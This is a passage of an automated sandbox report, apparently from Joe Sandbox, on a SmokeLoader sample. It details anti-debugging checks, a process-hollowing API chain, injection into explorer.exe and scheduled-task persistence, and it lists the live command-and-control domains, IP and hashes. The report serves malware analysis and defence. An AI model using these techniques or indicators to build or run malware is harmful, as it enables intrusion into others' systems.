Source: explorer.exe, 00000002.00000000.273864988.0000000006710000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorer.exe, 00000002.00000000.288891686.000000000F5F1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ions-msP
Source: explorer.exe, 00000002.00000000.318294845.0000000008304000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.323608732.000000000F5F1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001^
Source: explorer.exe, 00000002.00000000.279146238.00000000082B2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.318036977.0000000008251000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040DAC5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040DAC5

Source: C:\Users\user\Desktop\file.exe

0_2_0040DAD4

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00412320 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_00412320

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E0042 push dword ptr fs:[00000030h]		0_2_008E0042
Source: C:\Users\user\AppData\Roaming\rudwagu	Code function: 10_2_00729596 push dword ptr fs:[00000030h]		10_2_00729596

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C824 SetUnhandledExceptionFilter,	0_2_0040C824
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00411135 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00411135
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DAC5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040DAC5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040973F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040973F

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: rudwagu.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: host-file-host6.com
Source: C:\Windows\explorer.exe	Domain query: host-host-file8.com

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008E0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

0_2_008E0110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: 4EC1930			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	Thread created: unknown EIP: 2B11930			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rudwagu	Process created: C:\Users\user\AppData\Roaming\rudwagu C:\Users\user\AppData\Roaming\rudwagu			Jump to behavior

Source: explorer.exe, 00000002.00000000.330057159.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.260169112.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.300570546.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: explorer.exe, 00000002.00000000.330057159.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.273784795.0000000005D90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.341545832.000000000833A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.299803671.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.330057159.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.329320639.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.330057159.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.260169112.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.300570546.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\file.exe

Code function: GetLocaleInfoA,

0_2_004134ED

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040CBB2 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0040CBB2

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rudwagu.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rudwagu.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rudwagu.6e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rudwagu.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rudwagu.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.8e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rudwagu.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rudwagu.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rudwagu.6e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rudwagu.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rudwagu.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.8e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	512 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	331 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	512 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	112 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 File Deletion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\rudwagu	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.file.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.0.rudwagu.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.0.rudwagu.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.file.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.0.rudwagu.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
11.0.rudwagu.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
10.2.rudwagu.6e15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.rudwagu.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.file.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.file.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.0.rudwagu.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.0.rudwagu.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.file.exe.8e15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.0.rudwagu.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://host-file-host6.com/	0%	URL Reputation	safe
http://host-host-file8.com/	100%	URL Reputation	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
host-file-host6.com	84.21.172.159	true	true		unknown
host-host-file8.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://host-file-host6.com/	true	URL Reputation: safe	unknown
http://host-host-file8.com/	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000000.299803671.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.329320639.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.259861471.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
84.21.172.159	host-file-host6.com	Germany		30823	COMBAHTONcombahtonGmbHDE	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	764039
Start date and time:	2022-12-09 10:55:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/2@4/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 91% (good quality ratio 83.5%) Quality average: 71.6% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 22 Number of non-executed functions: 17
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, cdn.onenote.net
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
10:57:01	Task Scheduler	Run new task: Firefox Default Browser Agent 635557CDEDEC7374 path: C:\Users\user\AppData\Roaming\rudwagu

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
84.21.172.159	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	PlW1EFIbvc.exe	Get hash	malicious	Browse	host-file-host6.com/
	wlKbhd5bsS.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
host-file-host6.com	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	PlW1EFIbvc.exe	Get hash	malicious	Browse	84.21.172.159
	wlKbhd5bsS.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
COMBAHTONcombahtonGmbHDE	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	https://2gfnm.app.link/xHXJIVVbuvb	Get hash	malicious	Browse	84.21.172.16
	PlW1EFIbvc.exe	Get hash	malicious	Browse	84.21.172.159
	https://odggj.app.link/N51hIhDqzvb	Get hash	malicious	Browse	84.21.172.16
	wlKbhd5bsS.exe	Get hash	malicious	Browse	84.21.172.159
	TBN - SUPRAMAX PDA.PDF.js	Get hash	malicious	Browse	84.21.172.33
	181A0E4AA241E1BF7DA338760918724D3D1FB8FE828F2.exe	Get hash	malicious	Browse	160.20.145.136
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	https://pshoe.app.link/BsaHBSekuvb	Get hash	malicious	Browse	84.21.172.16
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159
	file.exe	Get hash	malicious	Browse	84.21.172.159

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\rudwagu

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	391680
Entropy (8bit):	5.905176085960016
Encrypted:	false
SSDEEP:	6144:rc/EL7Tgx5oWtxKD82s8hh6K9W9Ix5nKded89kTR:rXHTgvz/2TIK9W9Ix5nLaw
MD5:	0D810E582A95DEBFF5E1A72A76C602C9
SHA1:	486A963C02B9E7D5ECC2941C4DCB7F589954D7D7
SHA-256:	C57CAFEDD2E4617E24315CDE0DE7A6393610FB924E8BD4D3561EE3C4B2D90372
SHA-512:	FA74B3FBE4C9EEE7CF9FA8C27760E8315693380683A29BABEF33B30F6AD1FEAB670C6E2ABE92B5E0CBF9D44598C5ACD571A5C885D6DB7CA37C8947A01068D4E7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.m....C...C...C...C(..C...C...C...C...C$%xC...C...C}..C...C...C...C...C...C...CRich...C........PE..L......b.................n...........p............@..........................`......Z........................................s..<............................@......................................0I..@............................................text...Vm.......n.................. ..`.data................r..............@....lokeris.....p.......&..............@..@.zoyan..p............2..............@..@.rsrc................6..............@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rudwagu:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.905176085960016
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	391680
MD5:	0d810e582a95debff5e1a72a76c602c9
SHA1:	486a963c02b9e7d5ecc2941c4dcb7f589954d7d7
SHA256:	c57cafedd2e4617e24315cde0de7a6393610fb924e8bd4d3561ee3c4b2d90372
SHA512:	fa74b3fbe4c9eee7cf9fa8c27760e8315693380683a29babef33b30f6ad1feab670c6e2abe92b5e0cbf9d44598c5acd571a5c885d6db7ca37c8947a01068d4e7
SSDEEP:	6144:rc/EL7Tgx5oWtxKD82s8hh6K9W9Ix5nKded89kTR:rXHTgvz/2TIK9W9Ix5nLaw
TLSH:	0384CF013195C8F2C7A20D774816CBF1EA3BB42BFB249927F7583B5F6EF22914562A05
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.m....C...C...C...C(..C...C...C...C...C$%xC...C...C}..C...C...C...C...C...C...CRich...C........PE..L......b.................n.

File Icon


Icon Hash:	8286dccea68c9c84

Static PE Info

General

Entrypoint:	0x407096
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x622EE3A4 [Mon Mar 14 06:41:40 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	eeffe9860bc9c6507e24465b9b5239be

Entrypoint Preview

Instruction
call 00007F3448BA22FCh
jmp 00007F3448B9C65Eh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 28h
xor eax, eax
push ebx
mov ebx, dword ptr [ebp+0Ch]
push esi
mov esi, dword ptr [ebp+10h]
push edi
mov edi, dword ptr [ebp+08h]
mov byte ptr [ebp-08h], al
mov byte ptr [ebp-07h], al
mov byte ptr [ebp-06h], al
mov byte ptr [ebp-05h], al
mov byte ptr [ebp-04h], al
mov byte ptr [ebp-03h], al
mov byte ptr [ebp-02h], al
mov byte ptr [ebp-01h], al
cmp dword ptr [004432C4h], eax
je 00007F3448B9C7F0h
push dword ptr [00446268h]
call 00007F3448BA1228h
pop ecx
jmp 00007F3448B9C7E7h
mov eax, 0040CC48h
mov ecx, dword ptr [ebp+14h]
mov edx, 000000A6h
cmp ecx, edx
jg 00007F3448B9C95Ah
je 00007F3448B9C941h
cmp ecx, 19h
jg 00007F3448B9C8DEh
je 00007F3448B9C8CFh
mov edx, ecx
push 00000002h
pop ecx
sub edx, ecx
je 00007F3448B9C8B3h
dec edx
je 00007F3448B9C8A3h
sub edx, 05h
je 00007F3448B9C88Bh
dec edx
je 00007F3448B9C86Ch
sub edx, 05h
je 00007F3448B9C853h
dec edx
je 00007F3448B9C827h
sub edx, 09h
jne 00007F3448B9C9BAh
mov dword ptr [ebp-28h], 00000003h
mov dword ptr [ebp-24h], 00401348h
fld qword ptr [edi]
lea ecx, dword ptr [ebp-28h]
fstp qword ptr [ebp-20h]
push ecx
fld qword ptr [ebx]
fstp qword ptr [ebp+00h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x173c4	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x49000	0x1a510	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x64000	0xda4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11f0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4930	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x19c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
